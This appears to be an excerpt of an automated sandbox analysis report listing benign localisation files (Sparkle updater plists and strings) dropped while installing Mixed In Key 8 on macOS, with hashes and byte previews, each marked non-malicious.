Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. ... .s.t.a.t.o. .s.c.a.r.i.c.a.t.o. .e.d. ... .p.r.o.n.t.o. .p.e.r. .e.s.s.e.r.e. .u.t.i.l.i.z.z.a.t.o.!. .D.e.s.i.d.e.r.i. .i.n.s.t.a.l.l.a.r.e. .e. .r.i.a.v.v.i.a.r.e. . .%.1.$.@. .o.r.a.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".I.m.p.o.s.s.i.b.i.l.e. .a.g.g.i.o.r.n.a.r.e. .%.1.$.@. .q.u.a.n.d.o. .v.i.e.n.e. .e.s.e.g.u.i.t.o. .d.a. .u.n. .v.o.l.u.m.e. .d.i. .s.o.l.a. .l.e.t.t.u.r.a. .c.o.m.e. .u.n.. i.m.m.a.g.i.n.e. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_J1BbJg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18463
Entropy (8bit):	6.7841741490880905
Encrypted:	false
SSDEEP:	384:ZgWpE0DeEYNg7uH4+53NAKAsif17ZneEQb1l4bP8YU/8oWuSgBPd2C:ZgWDeEYyZKAdRZklO4/8oBBF2C
MD5:	6198B37320379E152D91C6075C408FD6
SHA1:	2370384B3D36E438BE5C5F596689503509367689
SHA-256:	7EF6106E88FA6FC13669692538187A851861A547CE69907C7C737DA9EA2245E9
SHA-512:	896F394BD37626D3A83887DC9552A7CADC3ECE694364CC7540307CF673A80FE7BD24198ACDBFD26FC4BD06987538D5BA4149530424B08E7F8347ADA864E46772
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_OrFjOq Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15585
Entropy (8bit):	6.808768927572087
Encrypted:	false
SSDEEP:	384:dgTfE0NeEYNg7ns2OFIcJtS+s8ZgVuUG+aj:dgTveEYyDSIcJ6UgxVaj
MD5:	187E84674C031504171C3B0EB54D896E
SHA1:	4F57A7B2521A11233A9E138E94DCC3CB331547A7
SHA-256:	4193E025F7847F3D4ED7B3710FA444905FF464AC65A8705CA9409074E92F3B2B
SHA-512:	47F22EEA28BB4BBCA6D17970DB6B91942A8BD4E98288000C62282FEE116B72504323FD1560930AAC531FC91969DD9E674393EA71546AFD2C20B9ED770E9433A9
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_ekEGWj Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12102
Entropy (8bit):	6.738918302956528
Encrypted:	false
SSDEEP:	192:zK1WxXxQOLnjE0lTjeEYNMtKwC/4I4kQ5Cs7sK5wNCZ/scX/cAQZP89pTArV:zKgxXxQwnjE0NeEYNg7C/4I4kQEWsfYg
MD5:	316221D69848EDC917325741E12631D3
SHA1:	816441256DA6B5985699CDA8EAAAA346C1A28D79
SHA-256:	E05CBC301623ADA97991B160BFAFE20DE089CCE3E6FB9C26250F23A7902D1FE3
SHA-512:	4669FCA581BAB979FDE34EE4CA0A669FD3309281DDB43B2C50CF00D43B881A612167044BBE54EC3CB382007113549475927B99FFBDA730F60D278BBC62B3F823
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_F62Xyj Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12177
Entropy (8bit):	6.772335684195305
Encrypted:	false
SSDEEP:	192:6gx1WlQOLXjE0lTjeEYNMtKwC/4I03cnwe8jFgInZftopK2sUjz0eNgbI:6gxglQwXjE0NeEYNg7C/4I0FsInZftoj
MD5:	5EEA1DB88F45526700D48D3104E78E78
SHA1:	F3A828F9C017E3AA3AC5DC8749FAF16B6FCC214D
SHA-256:	B63FB649F96E1C2C68093B11B6D9FF9AABEDA39D921DE2AFA26FC99447E8A448
SHA-512:	F54469C0764DF11E997109B038E29E36A77122E786FF745562D424CABC52C5598E4A54B8EE9FC515D4B81D76DFDAA340DEC724FD2FC8A700DAD4EC38F914439A
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................".#.$.+.,.-.4.5.6.K.N.O.Q.f...f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...h.k.m.o.v.y.\|....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....f.g....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRe

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_IofeuH Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15858
Entropy (8bit):	6.83963474801781
Encrypted:	false
SSDEEP:	384:ag8ifE0NeEYNg7ns2OF4PFJt5Gns/clAO4epl8U4jfehixYgV:ag8iveEYyDSaFJvGGceTzTjlxYgV
MD5:	8D2FCB4967B74BA0DF15EA64115765F5
SHA1:	0E61B3E6949B89C6D9472B192FFB1B76FF4D1346
SHA-256:	EB9013B5A6AE6E078B93515DFE05C20E2C0DB7A7ACD5929AB68A837D4C5C7FB2
SHA-512:	EF104461ACB0F79570B31FE54F91EA1EEBEA8CB1F78514F8A2BF59BCBD610863275BB5A1C484D8E6B57711DD102AB879151182FBE9FBE090D44666D203363B18
Malicious:	false
Preview:	bplist00..............%.&X$versionX$objectsY$archiverT$top................#.$....2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.3.4.5.6.;.P.W.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z...{.\|...........b.............................................................(.../.0.3.6.9.B.C.K.O.P.Y.Z.a.b.e.f.{........................................................................................................... .!.)..+.1.9.:.;.A.I.J.K.Q.X.Y.Z.a.b.c.}...........v.a....................................................................................."U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UN

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_NQGwfh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	5570
Entropy (8bit):	4.418597814595092
Encrypted:	false
SSDEEP:	96:M4yt+Ha3miA2qUHKG5VZnmbCnO1j6JXvNPyHpjLM27fM:MIa3mCTdmWnO1Sl6R42g
MD5:	A34BB9F567216105341442BBF3A1712D
SHA1:	89133480C61F780339F07C5C7461E5189A921587
SHA-256:	E2BD8D0DD9E25D4CAFD0C06E6DB7914B7DE862D761B168267FFFE3418ED1CC18
SHA-512:	9FE9C1BEAD98D4385585F090C56C59579C85D81C67C6ACEA499FEFCE8EF9B9275A19409DE6C821B75772BCA7341B14A23D31883AEC1239206C0E001B1EAD8AF1
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .L0.0.0.0.0.0.0U0.0~0W0_0.0!k.Vn0 .%.1.$.@. .w..RBfK0.0.O(u.S..k0j0.0~0Y0.0.NY0P0.Qw..RW0~0Y0K0?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .o0.0.0.0.0.0.0.0.0.0.0IQf[._.0.0.0.0j0i0n0.0.0.0.0.0.0.0.0.0.0.0.0K0.0w..RW0f0D0.04X.T.0.0.0.0.0.0.0g0M0~0[0.0.0%.1.$.@. ..0.0.0.0.0.0.0.0.0.0.0.0.0k0.y.RW0.0]0S0K0.0.Qw..RW0_0._.0.0.0.vW0f0.NU0D0.0".;.....".%.@. .%.@. .i.s. .c.u.r.r.e.n.t.l.y. .t.h.e. .n.e.w.e.s.t. .v.e.r.s.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/.BC.T_Y5ozo3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18243
Entropy (8bit):	6.862078689157274
Encrypted:	false
SSDEEP:	384:Ig2pE0DeEYNg7uH4+53NAKAsif17W4rvlq7AcJlU+1oQYgIwDuC:Ig2DeEYyZKAdRplq7fJIQYRRC
MD5:	C2F1F1819816C3DBBFB415E887D02250
SHA1:	E79929F7B096413171CB3D420732C511067FA0A3
SHA-256:	2AED81F2C1A7519B86450653A5DC48D01209B0DC1942A54F2D388EAC8A17DF1E
SHA-512:	12FF404CD978684DA82B255407DC0F65D37123E91131DF74ACC469AFC99B0053066646DF2115F6F80C8962148CD03BF0327DE335AFCC9CC0D027480150D9752A
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v................................................................................... .!.".+.1.2.3.6.9.<.=.?.@.A.B.C.F.G.L.M.Q.V.W.\.].i.j.k.l.s.t.u.x.\|.................................................x.`................................... .!.%.G.z._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_ANIMv7 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18166
Entropy (8bit):	6.854147270747212
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+53NAKiswzI7+YBJ1lflbP8YU/8oWuSgB8pr:ZgZDeEYyZKiPWPlfZ4/8oBBU
MD5:	D36A98D894AD32C660988EE1F013F992
SHA1:	8B6E79BF68D023F47780BF5B05634213423EBE11
SHA-256:	85A72DC1623C1C94167B59D253E6B767687BE5C7003261AC4A0AFC4AA1D650D6
SHA-512:	679B275CF2BECD39E1783F8B6895EC3D9A2EA47D961AD8D96CDDBA1463879C1312581E710F954578DAF5E4F417CFA0F283BB79D362D40EF0C0BF93089B64974A
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_AaKHfs Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15365
Entropy (8bit):	6.829733028482747
Encrypted:	false
SSDEEP:	384:RkgPpE0DeEYNg7uH4+iC3MJtDyvHp+nZEvONVJid1dcM7:RkgPDeEYyHC3MJQ4nZJJmt7
MD5:	5B3DC456CBA2020C01C6B5C4B7B63A07
SHA1:	9712F2CA97803700EA2E00A7723CE3B6A3A281DF
SHA-256:	4E85849D257AE5EDBE81A67BFCEB2AE11EC334C57CF50D6656F1FB5D4C9151A0
SHA-512:	475DFCF97E7F9BE8B212F5EC6FFCAC01EB9F93EF292AF7FD69EBF30665B176D3E9BEB46E3B1A2A30E42D10633E22EACB350575D244129AB0B549850F8777750D
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.\|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].b.f.j.m.n.s................................................................... .#.$.,.-...:.=.>.F.G.H.].a.e.f.h.i.j.p.u.v.{.........................................................................................................'.(.)./.6.7.8.?.@.A.[.^._.a.{...X._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys................. ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.8.9.:.;.<.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_CwCaDI Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	4.381559641332697
Encrypted:	false
SSDEEP:	96:M4Mt+2l3diU6YxcjxwRmF3nEmCn2/n6WOvOVqTxqs:Mbl3d1p8F3Un2/5vVAj
MD5:	E30C0A432130DCB71F1AA1A9A6811F07
SHA1:	EF6BE0E391A4419220495130EA04DD9B87B097C7
SHA-256:	4636D4E141E1840C1469E13983D4834EF8D7301B2583F5979F66ACFA3E540BC0
SHA-512:	8ADE77C7EE85A7CC9C99C9A7461E01341B0008E59B0D26A91B9248C3E79B23674FE8D4AFC170649F9ED37E81A5898F6D3BB82E30E770D6C79A8FF60B88E8BE08
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@.t.(...). ...\.. .......... ...\.....D. ...p.t..X.. ...... .X.......L.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@.t.(...). .....l. .t...... .C.D. ..\|.t... ...@. .}.0. .... ...h..... ....... ...<...\. ...p.t.. .`. ... ........ .%.1.$.@.D.(.\|.). .Q....\..... ...T.\. .t..X... .... ....t. .......$...".;.....".%.@. .%.@. .i.s. .c.u.r.r.e.n.t.l.y. .t.h.e. .n.e.w.e.s.t. .v.e.r.s.i.o.n. .a.v.a.i.l.a.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/.BC.T_XtuCY8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12072
Entropy (8bit):	6.760470385888766
Encrypted:	false
SSDEEP:	192:zK1WxXfQOLZjE0lTjeEYNMtKwC/4IC7Ys7sK5wNCZ/scX/cAQZPKX8J:zKgxXfQwZjE0NeEYNg7C/4IC7YWsfYXA
MD5:	E8DFC8C149663CE6442C4BB3CC36C2F3
SHA1:	BDD1AA57710CA792EF132C73C5F964CA0572811A
SHA-256:	A70F9E930C3248C8550A4FA5CD5D4199EBE7AF61575AD6A1F7BE86D37FE2A2BB
SHA-512:	610D68BBC66910B975E6F16EE36278CB15971484201003744EB3925685F7AE019AB1E8A2F063A670F2425B1FF1129BF4FF4F5890F5AA7C53CEF47BCF04D7B0DE
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_2eeN3o Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18264
Entropy (8bit):	6.840208788694169
Encrypted:	false
SSDEEP:	384:ZgfpE0DeEYNg7uH4+53NAKAswd17x5E7KCTaMzc1lVbP8YU/8oWuSgBVQii/x:ZgfDeEYyZKAJRxJHlJ4/8oBBVG/x
MD5:	578A0691CAEC48A3290FCF745975AC59
SHA1:	645FC40DC2C99E79036B5A85DCB7388677E24496
SHA-256:	84EC7CE470AB2CB5DE9CCF76DA68DF51391DD82A1ACF56C44F93C75788125EDE
SHA-512:	B49454489A38120B17CB7C33EDD54DB9D5071582DA437EB18F9EC655092C8D570BBF83670F33867F8CB1C7BD2B20E2345726BE1CA10A64E190AEFB2B364F69CF
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_VFQe3B Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15771
Entropy (8bit):	6.810998861076099
Encrypted:	false
SSDEEP:	384:yyggfE0NeEYNg7ns2OF3pWJtjGDTOUzCVXHFVsHQjo:jggveEYyDS3pWJlGBzyFVsHd
MD5:	3FB595B89656D1C737D48D51D58B82FC
SHA1:	AA2B1BF57CE320B83F129BA6862A092C3099ED24
SHA-256:	E5BC0F31D8349C610DD776C8C40EB8EEE6A508AF76E6134934CA751BFB1A71B1
SHA-512:	8472D1B38560B93E21162DEEA39C2E229D98201C9D5F21676768295FC28EA6CFAC5EB8FC8591842E89BE5323C3EAA54A52EDAEC81D309137DE56A8A1A3A7B1BA
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$..+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.\|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.

